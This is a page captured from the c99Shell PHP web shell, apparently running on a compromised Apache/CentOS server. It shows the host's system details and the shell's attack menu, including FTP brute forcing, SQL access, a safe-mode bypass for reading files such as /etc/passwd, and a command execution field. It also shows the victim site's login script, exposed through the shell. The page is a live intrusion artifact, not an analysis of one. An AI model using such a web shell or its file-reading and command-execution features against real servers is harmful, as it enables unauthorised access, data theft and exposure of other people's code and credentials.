110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage/eperson/ drwxr-xr-x Free 52.81 GB of 127.8 GB (41.32%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout


<?

include_once("../class/clsConnection.php");

include_once("../class/clsDB.php");

include_once("../ums/clsUser.php");

include_once("../ums/clsUmUser.php");

include_once("../ums/global.php");



session_start();

if (! session_is_registered ("oU")) {

    session_register("oU");

    $oU = new clsUser();

    session_register("sysDate0");

    $sysDate0=$nowDate;

    session_register("createUserId");

    session_register("updateUserId");

}

session_regenerate_id();

$SID=session_id();



$oC = new clsConnection($GLOBALS['HOST'], $GLOBALS['DB'], $GLOBALS['USER'], $GLOBALS['PASSWORD']);

$oUs = new umuser($oC);



$oUs->SearchByLogin($userName, $password);

if ($oUs->GetRecord()) {

    $oU->userID=$oUs->UsID;

    $oU->userLogin=$oUs->UsLogin;

    $oU->userName=$oUs->UsName;

    $oU->userPassword=$oUs->UsPassword;

    $oU->userPsCodeReg=$oUs->UsPsCode;

    $oU->userDptCode=$oUs->dptID;

    $oU->userDptName=$oUs->dptName;

    $oU->userPosCode=$oUs->posID;

    $oU->userPosName=$oUs->posName;

    $oU->WgID=$oUs->UsWgID;

    $oU->userIP=getenv("REMOTE_ADDR");

    $oUs->SetSessionID($oUs->UsID, session_id());

    $oU->sessionID  = session_id();

    $createUserId=$oUs->UsLogin;

    $updateUserId=$oUs->UsLogin;

    //goto main app    

    if ($oU->WgID==4) {

        echo "<meta http-equiv='refresh' content='0; URL=admin/'>";    

        exit();

    }

    if ($oU->WgID==5) {

        echo "<meta http-equiv='refresh' content='0; URL=student/'>";    

        exit();

    }

    if ($oU->WgID==6) {

        echo "<meta http-equiv='refresh' content='0; URL=student/'>";    

        exit();

    }

}

else{

    $oU->userID="";

    $oU->userLogin="";

    $oU->userPassword="";

    //$oU->userPsCode="";

    $oU->userPsCodeReg="";

    $oU->userIP="";

    $oU->userName="";

    $oU->userDptCode="";

    $oU->userDptName="";

    $oU->userPosCode="";

    $oU->userPosName="";

    //$oU->userPsCode="-1";

    $oU->userPsCodeReg="-1";

    $oU->sessionID="";

    $oU->Lang = "th";    

    $oU->WgID="";

    $oU->StID="";

    $oU->GpI="";

    $oU->MnID="";

    $oU->X="";

    $oU->C="";

    $oU->R="";

    $oU->U="";

    $oU->D="";

    $createUserId="";

    $updateUserId="";

    echo "<meta http-equiv='refresh' content='0; URL=loginfailed.php'>";    

    exit();

}

?>

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Command execute ::
Enter:	Select: